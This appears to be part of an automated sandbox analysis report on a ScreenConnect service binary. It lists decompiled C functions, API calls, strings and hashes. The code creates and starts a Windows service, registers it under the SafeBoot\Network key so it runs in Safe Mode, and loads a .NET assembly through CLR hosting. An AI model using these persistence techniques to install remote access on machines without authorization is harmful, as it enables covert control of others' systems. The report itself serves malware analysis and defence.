                                                                          0x003f14e1
                                                                          0x003f14e7
                                                                          0x003f14e9
                                                                          0x003f14f1
                                                                          0x003f14f8
                                                                          0x003f14f8
                                                                          0x003f14fd
                                                                          0x003f1507
                                                                          0x003f150d
                                                                          0x003f151c
                                                                          0x003f152c
                                                                          0x003f1530
                                                                          0x003f1537
                                                                          0x003f153d
                                                                          0x003f154a
                                                                          0x003f1554
                                                                          0x003f155a
                                                                          0x003f1560
                                                                          0x003f1566
                                                                          0x003f1570
                                                                          0x003f1576
                                                                          0x003f157b
                                                                          0x003f1581
                                                                          0x003f1583
                                                                          0x003f158b
                                                                          0x003f1592
                                                                          0x003f1592
                                                                          0x003f159d
                                                                          0x003f15a6
                                                                          0x003f15aa
                                                                          0x003f15ae
                                                                          0x003f15ba
                                                                          0x003f15c8
                                                                          0x003f15cd
                                                                          0x003f15d4
                                                                          0x003f15da
                                                                          0x003f15e2
                                                                          0x003f15e4
                                                                          0x003f15e7
                                                                          0x003f15e7
                                                                          0x003f15ea
                                                                          0x003f15f0
                                                                          0x003f15f5
                                                                          0x003f15f5
                                                                          0x003f15fe
                                                                          0x003f15fe
                                                                          0x003f160b
                                                                          0x003f160d
                                                                          0x003f1611
                                                                          0x003f1619
                                                                          0x003f161e
                                                                          0x003f161e
                                                                          0x003f1621
                                                                          0x003f1625
                                                                          0x003f162d
                                                                          0x003f1632
                                                                          0x003f1632
                                                                          0x003f1635
                                                                          0x003f1639
                                                                          0x003f1641
                                                                          0x003f1646
                                                                          0x003f1646
                                                                          0x003f1649
                                                                          0x003f164d
                                                                          0x003f1655
                                                                          0x003f165a
                                                                          0x003f165a
                                                                          0x003f165d
                                                                          0x003f1661
                                                                          0x003f1669
                                                                          0x003f166e
                                                                          0x003f166e
                                                                          0x003f1671
                                                                          0x003f1678
                                                                          0x003f1680
                                                                          0x003f1685
                                                                          0x003f1685
                                                                          0x003f168d
                                                                          0x003f1695
                                                                          0x003f1696
                                                                          0x003f16a4

                                                                          APIs
                                                                          • LoadLibraryW.KERNEL32(mscoree.dll,A8642A1F), ref: 003F11A1
                                                                          • GetProcAddress.KERNEL32(00000000,CLRCreateInstance), ref: 003F11AD
                                                                          • CorBindToRuntimeEx.MSCOREE(00000000,00000000,00000000,00402734,00402714,00000000), ref: 003F1286
                                                                          • SysAllocString.OLEAUT32(System.Reflection.Assembly), ref: 003F1339
                                                                          • SysFreeString.OLEAUT32(00000000), ref: 003F136C
                                                                          • GetModuleHandleW.KERNEL32(00000000), ref: 003F1374
                                                                          • GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 003F1387
                                                                          • PathRemoveExtensionW.SHLWAPI(?), ref: 003F1394
                                                                          • PathFindFileNameW.SHLWAPI(?), ref: 003F13A1
                                                                          • StrCpyW.SHLWAPI(?,00000000), ref: 003F13B5
                                                                          • StrCpyW.SHLWAPI(?,.dll), ref: 003F13DE
                                                                          • SafeArrayCreateVector.OLEAUT32(0000000C,00000000,00000001), ref: 003F13E6
                                                                          • VariantClear.OLEAUT32(?), ref: 003F1422
                                                                          • SysAllocString.OLEAUT32(?), ref: 003F1441
                                                                          • SafeArrayPutElement.OLEAUT32(?,00000000,?), ref: 003F147F
                                                                          • VariantClear.OLEAUT32(?), ref: 003F148C
                                                                          • VariantInit.OLEAUT32(?), ref: 003F14A6
                                                                          • VariantInit.OLEAUT32(?), ref: 003F14C6
                                                                          • SysAllocString.OLEAUT32(LoadFrom), ref: 003F14E1
                                                                          • SysFreeString.OLEAUT32(00000000), ref: 003F153D
                                                                          • VariantClear.OLEAUT32(?), ref: 003F154A
                                                                          • SysAllocString.OLEAUT32(?), ref: 003F157B
                                                                          • SysFreeString.OLEAUT32(00000000), ref: 003F15AE
                                                                          • VariantClear.OLEAUT32(?), ref: 003F160B
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000009.00000002.1191250625.00000000003F1000.00000020.00020000.sdmp, Offset: 003F0000, based on PE: true
                                                                          • Associated: 00000009.00000002.1191088158.00000000003F0000.00000002.00020000.sdmp Download File
                                                                          • Associated: 00000009.00000002.1191881743.00000000003FE000.00000002.00020000.sdmp Download File
                                                                          • Associated: 00000009.00000002.1192167597.0000000000404000.00000004.00020000.sdmp Download File
                                                                          • Associated: 00000009.00000002.1192433110.0000000000408000.00000002.00020000.sdmp Download File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_9_2_3f0000_ScreenConnect.jbxd
                                                                          Similarity
                                                                          • API ID: String$Variant$AllocClear$Free$ArrayFileInitModuleNamePathSafe$AddressBindCreateElementExtensionFindHandleLibraryLoadProcRemoveRuntimeVector
                                                                          • String ID: .dll$CLRCreateInstance$LoadFrom$System.Reflection.Assembly$mscoree.dll$v4.0.30319
                                                                          • API String ID: 867853067-1843332998
                                                                          • Opcode ID: 45ea4295470ec3f72bd01964f8b89d09530464a602b8a467609be783a0b807da
                                                                          • Instruction ID: d732d9cfbac88209a675b86f3277b7f6def34db9c6c74d324bf6bae78d7e6e3f
                                                                          • Opcode Fuzzy Hash: 45ea4295470ec3f72bd01964f8b89d09530464a602b8a467609be783a0b807da
                                                                          • Instruction Fuzzy Hash: 2DF180B0A00358DFDB21DBA4CD48BADBBB8AF49304F1441D9E608E7291DB759E84CF65
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 003F1880, Relevance: 38.7, APIs: 19, Strings: 3, Instructions: 151serviceregistrysleepCOMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          C-Code - Quality: 60%
                                                                          			E003F1880() {
				signed int _v8;
				signed int _v16;
				char _v40;
				void* _v56;
				intOrPtr _v64;
				struct _SERVICE_STATUS _v68;
				int _v72;
				intOrPtr _v76;
				struct _SERVICE_TABLE_ENTRY _v80;
				void* _v88;
				short* _v96;
				char _v100;
				char _v104;
				void* _v108;
				void* _v112;
				void* __edi;
				void* __esi;
				signed int _t34;
				int _t37;
				void* _t42;
				short* _t47;
				void* _t52;
				void* _t68;
				void* _t75;
				void* _t77;
				void* _t78;
				void* _t79;
				void* _t81;
				void* _t83;
				void* _t84;
				signed int _t88;
				signed int _t90;

				_t90 = (_t88 & 0xfffffff0) - 0x68;
				_t34 =  *0x404000; // 0xa8642a1f
				_v8 = _t34 ^ _t90;
				_v80 = 0x40259c;
				_v76 = E003F1700;
				_v72 = 0;
				_v68 = 0;
				_t37 = StartServiceCtrlDispatcherW( &_v80); // executed
				if(_t37 != 0) {
					L16:
					_pop(_t77);
					_pop(_t81);
					return E003F1B07(_t68, _v8 ^ _t90, _t75, _t77, _t81);
				} else {
					asm("xorps xmm0, xmm0");
					asm("movdqa [esp+0x14], xmm0");
					__imp__#8( &_v100);
					_t42 = E003F1160(_t68, L"GetServiceName",  &_v104);
					_t90 = _t90 + 4;
					if(_t42 < 0) {
						L14:
						__imp__#9( &_v104);
						_pop(_t78);
						_pop(_t83);
						return E003F1B07(_t68, _v16 ^ _t90, _t75, _t78, _t83);
					} else {
						_t84 = OpenSCManagerW(0, 0, 0x10000000);
						_v88 = _t84;
						_t47 = OpenServiceW(_t84, _v96, 0x10000000);
						_t79 = _t47;
						if(_t79 == 0) {
							_t79 = CreateServiceW(_t84, _v96, _t79, 0xf01ff, 0x10, 2, 1, GetCommandLineW(), _t47, _t47, _t47, _t47, 0x40259c);
						}
						RegOpenKeyW(0x80000002, L"System\\CurrentControlSet\\Control\\SafeBoot\\Network",  &_v108);
						RegOpenKeyW(_v108, _v96,  &_v112);
						_t52 = _v112;
						if(_t52 == 0) {
							RegCreateKeyW(_v108, _v96,  &_v112);
							_t52 = _v112;
						}
						asm("movdqu xmm0, [0x402704]");
						asm("movdqu [esp+0x68], xmm0");
						RegSetValueExW(_t52, 0, 0, 1,  &_v40, 0x10);
						if(QueryServiceStatus(_t79,  &_v68) != 0 && _v64 != 4) {
							StartServiceW(_t79, 0, 0);
						}
						if(QueryServiceStatus(_t79,  &_v68) != 0) {
							while(_v64 == 2) {
								Sleep(0x14);
								if(QueryServiceStatus(_t79,  &_v68) != 0) {
									continue;
								}
								goto L12;
							}
						}
						L12:
						CloseServiceHandle(_t79);
						CloseServiceHandle(_v88);
						if(_v64 == 4) {
							__imp__#9( &_v104);
							goto L16;
						} else {
							goto L14;
						}
					}
				}
			}



































                                                                          0x003f1886
                                                                          0x003f1889
                                                                          0x003f1890
                                                                          0x003f189a
                                                                          0x003f18a3
                                                                          0x003f18ab
                                                                          0x003f18b3
                                                                          0x003f18bb
                                                                          0x003f18c3
                                                                          0x003f1a44
                                                                          0x003f1a4a
                                                                          0x003f1a4b
                                                                          0x003f1a56
                                                                          0x003f18c9
                                                                          0x003f18cd
                                                                          0x003f18d1
                                                                          0x003f18d7
                                                                          0x003f18e7
                                                                          0x003f18ee
                                                                          0x003f18f3
                                                                          0x003f1a19
                                                                          0x003f1a1e
                                                                          0x003f1a26
                                                                          0x003f1a27
                                                                          0x003f1a36
                                                                          0x003f18f9
                                                                          0x003f1911
                                                                          0x003f1914
                                                                          0x003f1918
                                                                          0x003f191e
                                                                          0x003f1922
                                                                          0x003f194b
                                                                          0x003f194b
                                                                          0x003f1962
                                                                          0x003f1971
                                                                          0x003f1973
                                                                          0x003f1979
                                                                          0x003f1988
                                                                          0x003f198e
                                                                          0x003f198e
                                                                          0x003f1992
                                                                          0x003f19a8
                                                                          0x003f19ae
                                                                          0x003f19c4
                                                                          0x003f19d2
                                                                          0x003f19d2
                                                                          0x003f19e2
                                                                          0x003f19e4
                                                                          0x003f19ed
                                                                          0x003f19fd
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x003f19fd
                                                                          0x003f19e4
                                                                          0x003f19ff
                                                                          0x003f1a06
                                                                          0x003f1a0c
                                                                          0x003f1a13
                                                                          0x003f1a3e
                                                                          0x00000000
                                                                          0x003f1a15
                                                                          0x00000000
                                                                          0x003f1a15
                                                                          0x003f1a13
                                                                          0x003f18f3

                                                                          APIs
                                                                          • StartServiceCtrlDispatcherW.ADVAPI32(?,?,?), ref: 003F18BB
                                                                          • VariantInit.OLEAUT32(?), ref: 003F18D7
                                                                            • Part of subcall function 003F1160: LoadLibraryW.KERNEL32(mscoree.dll,A8642A1F), ref: 003F11A1
                                                                            • Part of subcall function 003F1160: GetProcAddress.KERNEL32(00000000,CLRCreateInstance), ref: 003F11AD
                                                                            • Part of subcall function 003F1160: CorBindToRuntimeEx.MSCOREE(00000000,00000000,00000000,00402734,00402714,00000000), ref: 003F1286
                                                                          • OpenSCManagerW.ADVAPI32(00000000,00000000,10000000), ref: 003F1902
                                                                          • OpenServiceW.ADVAPI32(00000000,?,10000000), ref: 003F1918
                                                                          • GetCommandLineW.KERNEL32(00000000,00000000,00000000,00000000,0040259C), ref: 003F192D
                                                                          • CreateServiceW.ADVAPI32(00000000,?,00000000,000F01FF,00000010,00000002,00000001,00000000), ref: 003F1945
                                                                          • RegOpenKeyW.ADVAPI32(80000002,System\CurrentControlSet\Control\SafeBoot\Network,?), ref: 003F1962
                                                                          • RegOpenKeyW.ADVAPI32(?,?,?), ref: 003F1971
                                                                          • RegCreateKeyW.ADVAPI32(?,?,?), ref: 003F1988
                                                                          • RegSetValueExW.ADVAPI32(?,00000000,00000000,00000001,?,00000010), ref: 003F19AE
                                                                          • QueryServiceStatus.ADVAPI32(00000000,?), ref: 003F19C0
                                                                          • StartServiceW.ADVAPI32(00000000,00000000,00000000), ref: 003F19D2
                                                                          • QueryServiceStatus.ADVAPI32(00000000,?), ref: 003F19DE
                                                                          • Sleep.KERNEL32(00000014), ref: 003F19ED
                                                                          • QueryServiceStatus.ADVAPI32(00000000,?), ref: 003F19F9
                                                                          • CloseServiceHandle.ADVAPI32(00000000), ref: 003F1A06
                                                                          • CloseServiceHandle.ADVAPI32(?), ref: 003F1A0C
                                                                          • VariantClear.OLEAUT32(?), ref: 003F1A1E
                                                                          • VariantClear.OLEAUT32(?), ref: 003F1A3E
                                                                          Strings
                                                                          • System\CurrentControlSet\Control\SafeBoot\Network, xrefs: 003F1958
                                                                          • GetServiceName, xrefs: 003F18E1
                                                                          • Service, xrefs: 003F1992
                                                                          Memory Dump Source
                                                                          • Source File: 00000009.00000002.1191250625.00000000003F1000.00000020.00020000.sdmp, Offset: 003F0000, based on PE: true
                                                                          • Associated: 00000009.00000002.1191088158.00000000003F0000.00000002.00020000.sdmp Download File
                                                                          • Associated: 00000009.00000002.1191881743.00000000003FE000.00000002.00020000.sdmp Download File
                                                                          • Associated: 00000009.00000002.1192167597.0000000000404000.00000004.00020000.sdmp Download File
                                                                          • Associated: 00000009.00000002.1192433110.0000000000408000.00000002.00020000.sdmp Download File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_9_2_3f0000_ScreenConnect.jbxd
                                                                          Similarity
                                                                          • API ID: Service$Open$QueryStatusVariant$ClearCloseCreateHandleStart$AddressBindCommandCtrlDispatcherInitLibraryLineLoadManagerProcRuntimeSleepValue
                                                                          • String ID: GetServiceName$Service$System\CurrentControlSet\Control\SafeBoot\Network
                                                                          • API String ID: 1169258217-68844702
                                                                          • Opcode ID: 8270cdbf3dd792c6a882069f6e7b895e5eec9cb0a69a216337f1a07af0a277ff
                                                                          • Instruction ID: ee98c969d6dcfd326881fbf0cebba79d0fb4d436384bda5376600173407f07d1
                                                                          • Opcode Fuzzy Hash: 8270cdbf3dd792c6a882069f6e7b895e5eec9cb0a69a216337f1a07af0a277ff
                                                                          • Instruction Fuzzy Hash: 7D51867150430AEFD612DB61DD49F7B7BECEB88715F000919FA84D6160DBB0E904CBA2
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 003F1700, Relevance: 26.4, APIs: 10, Strings: 5, Instructions: 101registryCOMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          C-Code - Quality: 42%
                                                                          			E003F1700(void* __ebx, void* __edx) {
				char _v16;
				signed int _v24;
				struct _SECURITY_ATTRIBUTES* _v28;
				intOrPtr _v40;
				signed int _v48;
				short _v548;
				short _v552;
				char* _v564;
				char* _v568;
				char* _v572;
				struct _SECURITY_ATTRIBUTES* _v600;
				struct _SECURITY_ATTRIBUTES* _v604;
				intOrPtr _v608;
				struct _SECURITY_ATTRIBUTES* _v612;
				struct _SERVICE_STATUS _v616;
				struct _SERVICE_STATUS _v620;
				char _v644;
				char _v648;
				void* __edi;
				void* __esi;
				signed int _t33;
				signed int _t35;
				int _t45;
				void* _t62;
				int _t65;
				void* _t67;
				signed int _t69;
				signed int _t71;
				void* _t72;
				signed int _t73;
				signed int _t75;
				signed int _t76;

				_t62 = __edx;
				_push(0xffffffff);
				_push(E003FD26B);
				_push( *[fs:0x0]);
				_t75 = (_t73 & 0xfffffff0) - 0x26c;
				_t33 =  *0x404000; // 0xa8642a1f
				_v24 = _t33 ^ _t75;
				_t35 =  *0x404000; // 0xa8642a1f
				_push(_t35 ^ _t75);
				 *[fs:0x0] =  &_v16;
				_t69 = 0;
				_v572 = L"Stop";
				_v568 = L"SessionChange";
				_v564 = L"Shutdown";
				do {
					E003F1C97(GetCurrentProcessId(),  &_v548, 0x104, 0xa);
					_t75 = _t75 + 0x10;
					StrCatW( &_v548,  *(_t75 + _t69 + 0x4c));
					 *((intOrPtr*)(_t75 + _t69 + 0x58)) = CreateEventW(0, 1, 0,  &_v552);
					_t69 = _t69 + 4;
				} while (_t69 < 0xc);
				_t45 =  &_v564;
				__imp__RegisterServiceCtrlHandlerExW(0, E003F16B0, _t45);
				_t65 = _t45;
				_v616 = 0x10;
				_v600 = 0;
				_v604 = 0;
				_v612 = 4;
				_v608 = 0x85;
				SetServiceStatus(_t65,  &_v616); // executed
				asm("xorps xmm0, xmm0");
				asm("movdqa [esp+0x18], xmm0");
				__imp__#8( &_v644);
				_v28 = 0;
				E003F1160(__ebx, L"Run",  &_v648); // executed
				_t76 = _t75 + 4;
				_v616 = 1;
				_v612 = 0;
				SetServiceStatus(_t65,  &_v620);
				_t71 = 0;
				do {
					CloseHandle( *(_t76 + 0x58 + _t71 * 4));
					_t71 = _t71 + 1;
				} while (_t71 < 3);
				__imp__#9( &_v648);
				 *[fs:0x0] = _v40;
				_pop(_t67);
				_pop(_t72);
				return E003F1B07(__ebx, _v48 ^ _t76, _t62, _t67, _t72);
			}



































                                                                          0x003f1700
                                                                          0x003f1706
                                                                          0x003f1708
                                                                          0x003f1713
                                                                          0x003f1714
                                                                          0x003f171a
                                                                          0x003f1721
                                                                          0x003f172a
                                                                          0x003f1731
                                                                          0x003f1739
                                                                          0x003f1745
                                                                          0x003f1747
                                                                          0x003f174f
                                                                          0x003f1757
                                                                          0x003f1760
                                                                          0x003f176f
                                                                          0x003f1774
                                                                          0x003f1780
                                                                          0x003f1797
                                                                          0x003f179b
                                                                          0x003f179e
                                                                          0x003f17a3
                                                                          0x003f17af
                                                                          0x003f17bb
                                                                          0x003f17c1
                                                                          0x003f17cb
                                                                          0x003f17d3
                                                                          0x003f17db
                                                                          0x003f17e3
                                                                          0x003f17eb
                                                                          0x003f17f1
                                                                          0x003f17f5
                                                                          0x003f17fb
                                                                          0x003f1805
                                                                          0x003f1816
                                                                          0x003f181b
                                                                          0x003f181e
                                                                          0x003f182a
                                                                          0x003f1834
                                                                          0x003f183c
                                                                          0x003f1840
                                                                          0x003f1844
                                                                          0x003f1846
                                                                          0x003f1847
                                                                          0x003f1851
                                                                          0x003f185e
                                                                          0x003f1866
                                                                          0x003f1867
                                                                          0x003f1879

                                                                          APIs
                                                                          • GetCurrentProcessId.KERNEL32(?,00000104,0000000A), ref: 003F176C
                                                                          • __itow_s.LIBCMT ref: 003F176F
                                                                            • Part of subcall function 003F1C97: _xtow_s@20.LIBCMT ref: 003F1CB9
                                                                          • StrCatW.SHLWAPI(?,?), ref: 003F1780
                                                                          • CreateEventW.KERNEL32(00000000,00000001,00000000,?,?,A8642A1F), ref: 003F1791
                                                                          • RegisterServiceCtrlHandlerExW.ADVAPI32(00000000,Function_000016B0,?,?,A8642A1F), ref: 003F17AF
                                                                          • SetServiceStatus.SECHOST(?,?,?,?,00000000,?), ref: 003F17EB
                                                                          • VariantInit.OLEAUT32(?), ref: 003F17FB
                                                                          • SetServiceStatus.ADVAPI32(00000000,?), ref: 003F1834
                                                                          • CloseHandle.KERNEL32(?), ref: 003F1844
                                                                          • VariantClear.OLEAUT32(?), ref: 003F1851
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000009.00000002.1191250625.00000000003F1000.00000020.00020000.sdmp, Offset: 003F0000, based on PE: true
                                                                          • Associated: 00000009.00000002.1191088158.00000000003F0000.00000002.00020000.sdmp Download File
                                                                          • Associated: 00000009.00000002.1191881743.00000000003FE000.00000002.00020000.sdmp Download File
                                                                          • Associated: 00000009.00000002.1192167597.0000000000404000.00000004.00020000.sdmp Download File
                                                                          • Associated: 00000009.00000002.1192433110.0000000000408000.00000002.00020000.sdmp Download File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_9_2_3f0000_ScreenConnect.jbxd
                                                                          Similarity
                                                                          • API ID: Service$StatusVariant$ClearCloseCreateCtrlCurrentEventHandleHandlerInitProcessRegister__itow_s_xtow_s@20
                                                                          • String ID: <&@$H&@$Run$d&@$pGWv
                                                                          • API String ID: 3663874838-1630455827
                                                                          • Opcode ID: cf4a9d600712be9c66b8731ea79181e31d8df4cc92150c757bf7c3dc86d65007
                                                                          • Instruction ID: bec448340e178f0f4982f56612f9f26ed73947e950b14d2a3fa960d2108be2a2
                                                                          • Opcode Fuzzy Hash: cf4a9d600712be9c66b8731ea79181e31d8df4cc92150c757bf7c3dc86d65007
                                                                          • Instruction Fuzzy Hash: 6C41C0B14083449FD321DF64DD48B6BBBECFB89714F40092EFA81972A0DBB5A804CB52
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 003F1DFE, Relevance: 22.8, APIs: 12, Strings: 1, Instructions: 89COMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          C-Code - Quality: 88%
                                                                          			_entry_(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr _t17;
				void* _t18;
				void* _t19;
				intOrPtr _t23;
				void* _t24;
				void* _t25;
				void* _t26;
				void* _t27;
				intOrPtr _t28;
				signed int _t39;
				void* _t49;
				signed int _t52;
				void* _t54;
				void* _t56;

				_t50 = __edi;
				_t49 = __edx;
				E003F3894();
				_push(0x14);
				_push(0x402af0);
				E003F2690(__ebx, __edi, __esi);
				_t52 = E003F3A7B() & 0x0000ffff;
				E003F3847(2);
				_t56 =  *0x3f0000 - 0x5a4d; // 0x5a4d
				if(_t56 == 0) {
					_t17 =  *0x3f003c; // 0x100
					__eflags =  *((intOrPtr*)(_t17 + 0x3f0000)) - 0x4550;
					if( *((intOrPtr*)(_t17 + 0x3f0000)) != 0x4550) {
						goto L2;
					} else {
						__eflags =  *((intOrPtr*)(_t17 + 0x3f0018)) - 0x10b;
						if( *((intOrPtr*)(_t17 + 0x3f0018)) != 0x10b) {
							goto L2;
						} else {
							_t39 = 0;
							__eflags =  *((intOrPtr*)(_t17 + 0x3f0074)) - 0xe;
							if( *((intOrPtr*)(_t17 + 0x3f0074)) > 0xe) {
								__eflags =  *(_t17 + 0x3f00e8);
								_t6 =  *(_t17 + 0x3f00e8) != 0;
								__eflags = _t6;
								_t39 = 0 | _t6;
							}
						}
					}
				} else {
					L2:
					_t39 = 0;
				}
				 *(_t54 - 0x1c) = _t39;
				_t18 = E003F226C();
				_t57 = _t18;
				if(_t18 == 0) {
					E003F1F58(0x1c);
				}
				_t19 = E003F2FD6(_t39, _t50, _t57);
				_t58 = _t19;
				if(_t19 == 0) {
					_t19 = E003F1F58(0x10);
				}
				E003F3930(_t19);
				 *(_t54 - 4) =  *(_t54 - 4) & 0x00000000;
				if(E003F3069(_t39, _t50, _t52, _t58) < 0) {
					E003F1F58(0x1b);
				}
				 *0x40703c = GetCommandLineA(); // executed
				_t23 = E003F3970(_t49); // executed
				 *0x40519c = _t23;
				_t24 = E003F331D();
				_t60 = _t24;
				if(_t24 < 0) {
					E003F22CB(_t39, _t49, _t50, _t52, _t60, 8);
				}
				_t25 = E003F354C(_t39, _t49, _t50, _t52);
				_t61 = _t25;
				if(_t25 < 0) {
					E003F22CB(_t39, _t49, _t50, _t52, _t61, 9);
				}
				_t26 = E003F2305(1); // executed
				_t62 = _t26;
				if(_t26 != 0) {
					E003F22CB(_t39, _t49, _t50, _t52, _t62, _t26);
				}
				_t27 = E003F3DDE();
				_push(_t52);
				_push(_t27);
				_push(0);
				_push(0x3f0000); // executed
				_t28 = E003F1880(); // executed
				_t53 = _t28;
				 *((intOrPtr*)(_t54 - 0x24)) = _t28;
				if(_t39 == 0) {
					E003F256E(_t53);
				}
				E003F22F6();
				 *(_t54 - 4) = 0xfffffffe;
				return E003F26D5(_t53);
			}

















                                                                          0x003f1dfe
                                                                          0x003f1dfe
                                                                          0x003f1dfe
                                                                          0x003f1e08
                                                                          0x003f1e0a
                                                                          0x003f1e0f
                                                                          0x003f1e19
                                                                          0x003f1e1e
                                                                          0x003f1e29
                                                                          0x003f1e30
                                                                          0x003f1e36
                                                                          0x003f1e3b
                                                                          0x003f1e45
                                                                          0x00000000
                                                                          0x003f1e47
                                                                          0x003f1e4c
                                                                          0x003f1e53
                                                                          0x00000000
                                                                          0x003f1e55
                                                                          0x003f1e55
                                                                          0x003f1e57
                                                                          0x003f1e5e
                                                                          0x003f1e60
                                                                          0x003f1e66
                                                                          0x003f1e66
                                                                          0x003f1e66
                                                                          0x003f1e66
                                                                          0x003f1e5e
                                                                          0x003f1e53
                                                                          0x003f1e32
                                                                          0x003f1e32
                                                                          0x003f1e32
                                                                          0x003f1e32
                                                                          0x003f1e69
                                                                          0x003f1e6c
                                                                          0x003f1e71
                                                                          0x003f1e73
                                                                          0x003f1e77
                                                                          0x003f1e7c
                                                                          0x003f1e7d
                                                                          0x003f1e82
                                                                          0x003f1e84
                                                                          0x003f1e88
                                                                          0x003f1e8d
                                                                          0x003f1e8e
                                                                          0x003f1e93
                                                                          0x003f1e9e
                                                                          0x003f1ea2
                                                                          0x003f1ea7
                                                                          0x003f1eae
                                                                          0x003f1eb3
                                                                          0x003f1eb8
                                                                          0x003f1ebd
                                                                          0x003f1ec2
                                                                          0x003f1ec4
                                                                          0x003f1ec8
                                                                          0x003f1ecd
                                                                          0x003f1ece
                                                                          0x003f1ed3
                                                                          0x003f1ed5
                                                                          0x003f1ed9
                                                                          0x003f1ede
                                                                          0x003f1ee1
                                                                          0x003f1ee7
                                                                          0x003f1ee9
                                                                          0x003f1eec
                                                                          0x003f1ef1
                                                                          0x003f1ef2
                                                                          0x003f1ef7
                                                                          0x003f1ef8
                                                                          0x003f1ef9
                                                                          0x003f1efb
                                                                          0x003f1f00
                                                                          0x003f1f05
                                                                          0x003f1f07
                                                                          0x003f1f0c
                                                                          0x003f1f0f
                                                                          0x003f1f0f
                                                                          0x003f1f14
                                                                          0x003f1f49
                                                                          0x003f1f57

                                                                          APIs
                                                                          • ___security_init_cookie.LIBCMT ref: 003F1DFE
                                                                          • ___crtGetShowWindowMode.LIBCMT ref: 003F1E14
                                                                            • Part of subcall function 003F3A7B: GetStartupInfoW.KERNEL32(?), ref: 003F3A85
                                                                          • _fast_error_exit.LIBCMT ref: 003F1E77
                                                                          • _fast_error_exit.LIBCMT ref: 003F1E88
                                                                          • __RTC_Initialize.LIBCMT ref: 003F1E8E
                                                                          • _fast_error_exit.LIBCMT ref: 003F1EA2
                                                                          • GetCommandLineA.KERNEL32(00402AF0,00000014), ref: 003F1EA8
                                                                          • ___crtGetEnvironmentStringsA.LIBCMT ref: 003F1EB3
                                                                          • __setargv.LIBCMT ref: 003F1EBD
                                                                          • __setenvp.LIBCMT ref: 003F1ECE
                                                                          • __cinit.LIBCMT ref: 003F1EE1
                                                                          • __wincmdln.LIBCMT ref: 003F1EF2
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000009.00000002.1191250625.00000000003F1000.00000020.00020000.sdmp, Offset: 003F0000, based on PE: true
                                                                          • Associated: 00000009.00000002.1191088158.00000000003F0000.00000002.00020000.sdmp Download File
                                                                          • Associated: 00000009.00000002.1191881743.00000000003FE000.00000002.00020000.sdmp Download File
                                                                          • Associated: 00000009.00000002.1192167597.0000000000404000.00000004.00020000.sdmp Download File
                                                                          • Associated: 00000009.00000002.1192433110.0000000000408000.00000002.00020000.sdmp Download File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_9_2_3f0000_ScreenConnect.jbxd
                                                                          Similarity
                                                                          • API ID: _fast_error_exit$___crt$CommandEnvironmentInfoInitializeLineModeShowStartupStringsWindow___security_init_cookie__cinit__setargv__setenvp__wincmdln
                                                                          • String ID: .$
                                                                          • API String ID: 4062026167-2223841709
                                                                          • Opcode ID: 574d10505e20723f1eb78015812a0d55340cd0a32efdaff969138383a23ac257
                                                                          • Instruction ID: e5c793178c9147dd64f145f9e63d90ef194d6908f7f7c2f91a3adea90c933e83
                                                                          • Opcode Fuzzy Hash: 574d10505e20723f1eb78015812a0d55340cd0a32efdaff969138383a23ac257
                                                                          • Instruction Fuzzy Hash: A321D670A4031EE9EB2777B6BD56B3F21586F10765F10052AFB04AE0D7DFB4C9409A61
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 003F2FD6, Relevance: 10.5, APIs: 7, Instructions: 45threadCOMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          C-Code - Quality: 91%
                                                                          			E003F2FD6(void* __ebx, void* __edi, void* __eflags) {
				void* __esi;
				void* _t3;
				intOrPtr _t6;
				long* _t9;
				long _t14;
				long* _t27;

				E003F239D(_t3);
				if(E003F4B02() != 0) {
					_t6 = E003F39FD(E003F2D67);
					 *0x404180 = _t6;
					__eflags = _t6 - 0xffffffff;
					if(_t6 == 0xffffffff) {
						goto L1;
					} else {
						_t9 = E003F25B3(1, 0x3bc); // executed
						_t27 = _t9;
						__eflags = _t27;
						if(_t27 == 0) {
							L6:
							E003F304C();
							__eflags = 0;
							return 0;
						} else {
							__eflags = E003F3A59( *0x404180, _t27);
							if(__eflags == 0) {
								goto L6;
							} else {
								_push(0);
								_push(_t27);
								E003F2F23(__ebx, __edi, _t27, __eflags);
								_t14 = GetCurrentThreadId();
								_t27[1] = _t27[1] | 0xffffffff;
								 *_t27 = _t14;
								__eflags = 1;
								return 1;
							}
						}
					}
				} else {
					L1:
					E003F304C();
					return 0;
				}
			}









                                                                          0x003f2fd6
                                                                          0x003f2fe2
                                                                          0x003f2ff1
                                                                          0x003f2ff6
                                                                          0x003f2ffc
                                                                          0x003f2fff
                                                                          0x00000000
                                                                          0x003f3001
                                                                          0x003f3009
                                                                          0x003f300e
                                                                          0x003f3012
                                                                          0x003f3014
                                                                          0x003f3043
                                                                          0x003f3043
                                                                          0x003f3048
                                                                          0x003f304b
                                                                          0x003f3016
                                                                          0x003f3024
                                                                          0x003f3026
                                                                          0x00000000
                                                                          0x003f3028
                                                                          0x003f3028
                                                                          0x003f302a
                                                                          0x003f302b
                                                                          0x003f3032
                                                                          0x003f3038
                                                                          0x003f303c
                                                                          0x003f3040
                                                                          0x003f3042
                                                                          0x003f3042
                                                                          0x003f3026
                                                                          0x003f3014
                                                                          0x003f2fe4
                                                                          0x003f2fe4
                                                                          0x003f2fe4
                                                                          0x003f2feb
                                                                          0x003f2feb

                                                                          APIs
                                                                          • __init_pointers.LIBCMT ref: 003F2FD6
                                                                            • Part of subcall function 003F239D: RtlEncodePointer.NTDLL(00000000,?,003F2FDB,003F1E82,00402AF0,00000014), ref: 003F23A0
